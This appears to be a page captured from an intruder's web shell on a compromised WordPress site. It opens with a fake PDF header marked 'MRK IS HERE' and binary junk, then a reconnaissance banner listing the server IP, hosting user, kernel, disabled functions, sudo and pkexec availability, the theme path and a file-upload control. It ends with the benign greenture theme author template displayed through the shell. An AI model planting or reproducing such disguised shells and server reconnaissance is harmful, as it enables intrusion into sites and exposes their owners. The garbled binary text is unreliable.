...........................................................................................................................................................................................................................................................................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%PDF-1.5 MRK IS HERE %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
| Server IP : 65.108.66.160 / Your IP : 216.73.217.50 Web Server : Apache System : Linux srv16.asso.com.ar 4.18.0-553.123.1.el8_10.x86_64 #1 SMP Tue May 5 04:00:43 EDT 2026 x86_64 User : alasaweborg ( 1047) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/alasaweborg/public_html/wp-content/themes/greenture/ |
Upload File : |
<?php
/**
* Author Template
*
* @package greenture
*/
get_header();
$container_class = $scroll_type = '';
$blog_type = greenture_get_option( 'archive_blog_type' );
$blog_grid_columns = greenture_get_option( 'blog_grid_columns' );
if( $blog_type == 'grid' ) {
if( $blog_grid_columns != '' ) {
if( $blog_grid_columns == 'two' ) {
$container_class = 'grid-layout grid-col-2';
} elseif ( $blog_grid_columns == 'three' ) {
$container_class = 'grid-layout grid-col-3';
} elseif ( $blog_grid_columns == 'four' ) {
$container_class = 'grid-layout grid-col-4';
}
}
$post_class = 'grid-posts';
$page_type_layout = 'grid';
$image_size = 'greenture-blog-list';
$excerpt_limit = greenture_get_option( 'blog_excerpt_length_grid' );
} elseif( $blog_type == 'large' ) {
$container_class = 'large-layout';
$post_class = 'large-posts';
$image_size = 'greenture-blog-large';
$page_type_layout = 'large';
$excerpt_limit = greenture_get_option( 'blog_excerpt_length_large' );
} elseif( $blog_type == 'list' ) {
$container_class = 'list-layout';
$post_class = 'list-posts';
$image_size = 'greenture-blog-list';
$page_type_layout = 'list';
$list_fullwidth = greenture_get_option( 'blog_list_fullwidth' );
if( isset( $list_fullwidth ) && $list_fullwidth == 'no' ) {
$excerpt_limit = 15;
} else {
$excerpt_limit = 30;
}
if( isset( $list_fullwidth ) && $list_fullwidth == 'no' ) {
$container_class .= ' list-columns';
} else {
$container_class .= ' list-fullwidth';
}
}
if( greenture_get_option( 'disable_blog_pagination' ) ) {
$scroll_type = "infinite";
$scroll_type_class = " scroll-infinite";
} else {
$scroll_type = "pagination";
$scroll_type_class = " scroll-pagination";
}
?>
<div class="container">
<div id="main-wrapper" class="tpath-row row">
<div id="single-sidebar-container" class="single-sidebar-container main-col-full">
<div class="tpath-row row">
<div id="primary" class="content-area <?php greenture_primary_content_classes(); ?>">
<div id="content" class="site-content">
<?php echo wp_kses_post(greenture_author_info()); ?>
<div id="archive-posts-container" class="tpath-posts-container <?php echo esc_attr( $container_class ); ?><?php echo esc_attr( $scroll_type_class ); ?> clearfix">
<?php if ( have_posts() ):
while ( have_posts() ): the_post();
$post_id = get_the_ID();
$post_format = get_post_format();
$post_format_class = '';
if( $post_format == 'image' ) {
$post_format_class = ' image-format';
} elseif( $post_format == 'quote' ) {
$post_format_class = ' quote-image';
} ?>
<article id="post-<?php echo esc_attr( $post_id ); ?>" <?php post_class($post_class); ?>>
<div class="posts-inner-container clearfix">
<div class="posts-content-container">
<?php if ( has_post_thumbnail() && ! post_password_required() ) {
echo wp_kses_post(greenture_blog_featured_image( $image_size, $post_format, $page_type_layout ));
} ?>
<div class="post-content">
<div class="entry-header">
<?php if( $page_type_layout != 'list' ) {
echo wp_kses_post(greenture_blog_entry_meta( $page_type_layout ));
}
echo wp_kses_post(greenture_blog_title()); ?>
</div>
<div class="entry-summary">
<?php echo wp_kses_post(greenture_blog_content( $excerpt_limit )); ?>
</div>
<div class="entry-footer">
<?php echo wp_kses_post(greenture_blog_footer()); ?>
</div>
</div>
</div>
</div>
</article>
<?php endwhile;
else :
get_template_part( 'content', 'none' );
endif; ?>
</div>
<?php echo wp_kses_post(greenture_pagination( $pages = '', $scroll_type ));
wp_reset_postdata(); ?>
</div><!-- #content -->
</div><!-- #primary -->
<?php get_sidebar(); ?>
</div>
</div><!-- #single-sidebar-container -->
</div><!-- #main-wrapper -->
</div><!-- .container -->
<?php get_footer(); ?>